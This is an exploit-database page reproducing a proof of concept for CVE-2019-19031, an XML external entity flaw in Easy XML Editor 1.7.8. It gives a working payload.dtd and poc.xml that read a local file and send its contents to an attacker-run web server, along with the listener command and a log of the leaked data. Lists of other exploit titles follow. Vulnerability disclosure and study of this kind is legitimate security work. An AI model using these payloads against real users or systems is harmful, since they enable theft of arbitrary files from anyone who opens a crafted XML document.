Menu

Search for hundreds of thousands of exploits

"Easy XML Editor 1.7.8 - XML External Entity Injection"

Author

Exploit author

"Javier Olmedo"

Platform

Exploit platform

xml

Release date

Exploit published date

2020-01-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-21
# Vendor: Richard Wuerflein
# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
# Affected Version: 1.7.8 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19031
# References:
# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/
 
# 1. Technical Description
# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability
# through the malicious XML file. This allows a malicious user to read arbitrary files.
 
# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.

python -m SimpleHTTPServer 80

# 2.2 Upload the payload.dtd file to your web server.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;

# 2.3 Create a SECRET.TXT file with any content in desktop.

# 2.4 Open poc.xml

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 2.5 Your web server will receive a request with the contents of the secret.txt file

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -

# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER]  Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure

# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
Release DateTitleTypePlatformAuthor
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
Release DateTitleTypePlatformAuthor
2020-02-07"ExpertGPS 6.38 - XML External Entity Injection"webappsxml"Trent Gordon"
2020-01-22"Citrix XenMobile Server 10.8 - XML External Entity Injection"webappsxml"Jonas Lejon"
2020-01-20"Easy XML Editor 1.7.8 - XML External Entity Injection"localxml"Javier Olmedo"
2020-01-09"MSN Password Recovery 1.30 - XML External Entity Injection"localxmlZwX
2019-12-04"Microsoft Visual Basic 2010 Express - XML External Entity Injection"localxmlZwX
2019-12-03"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass"localxmlhyp3rlinx
2019-12-02"Visual Studio 2008 - XML External Entity Injection"localxmlhyp3rlinx
2019-12-02"Microsoft Excel 2016 1901 - XML External Entity Injection"localxmlhyp3rlinx
2019-11-11"XML Notepad 2.8.0.4 - XML External Entity Injection"localxmldaejinoh
2019-10-30"Citrix StoreFront Server 7.15 - XML External Entity Injection"webappsxml"Vahagn Vardanyan"
2019-10-21"winrar 5.80 - XML External Entity Injection"localxmlalblalawi
2018-12-18"SDL Web Content Manager 8.5.0 - XML External Entity Injection"webappsxml"Ahmed Elhady Mohamed"
2018-09-06"NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)"webappsxmlLiquidWorm
2018-08-03"Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection"webappsxml"Chris Moberly"
2018-08-03"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection"webappsxml"Chris Moberly"
2018-08-02"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection"webappsxml"Chris Moberly"
2018-06-12"OX App Suite 7.8.4 - Multiple Vulnerabilities"webappsxmlOpen-Xchange
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-09"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection"webappsxmlLiquidWorm
2018-03-30"Systematic SitAware - NVG Denial of Service"dosxml2u53
2018-03-23"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass"webappsxmlMatamorphosis
2017-11-03"Ladon Framework for Python 0.9.40 - XML External Entity Expansion"webappsxml"RedTeam Pentesting"
2017-10-30"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure"webappsxmlmr_me
2017-10-17"Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution"webappsxml"Michael Stepankin & Olga Barinova"
2017-08-18"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities"webappsxmlVVVSecurity
2017-05-30"Trend Micro Deep Security 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution"webappsxmlSecuriTeam
2017-05-19"SAP Business One for Android 1.2.3 - XML External Entity Injection"webappsxml"Ravindra Singh Rathore"
2017-05-17"INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields"webappsxmlYoroi
2017-05-17"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution"remotexml"Ambionics Security"
2017-05-17"INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection"webappsxmlYoroi
Release DateTitleTypePlatformAuthor
2020-03-02"Joplin Desktop 1.0.184 - Cross-Site Scripting"webappsmultiple"Javier Olmedo"
2020-01-29"XMLBlueprint 16.191112 - XML External Entity Injection"localwindows"Javier Olmedo"
2020-01-20"Easy XML Editor 1.7.8 - XML External Entity Injection"localxml"Javier Olmedo"
2019-08-26"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection"webappsphp"Javier Olmedo"
2019-03-26"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting"webappsphp"Javier Olmedo"
2018-12-19"Integria IMS 5.0.83 - Cross-Site Request Forgery"webappsphp"Javier Olmedo"
2018-12-19"Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting"webappsphp"Javier Olmedo"
2018-12-03"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery"webappsphp"Javier Olmedo"
2018-11-26"Ticketly 1.0 - 'kind_id' SQL Injection"webappsphp"Javier Olmedo"
2018-11-21"Ticketly 1.0 - 'name' SQL Injection"webappsphp"Javier Olmedo"
2018-11-20"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Javier Olmedo"
2018-09-06"Jorani Leave Management 0.6.5 - Cross-Site Scripting"webappsphp"Javier Olmedo"
2018-09-06"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection"webappsphp"Javier Olmedo"
2018-08-27"Sentrifugo HRMS 3.2 - 'deptid' SQL Injection"webappswindows"Javier Olmedo"
2018-08-16"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection"webappsphp"Javier Olmedo"
2018-07-19"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting"webappsphp"Javier Olmedo"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47945/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse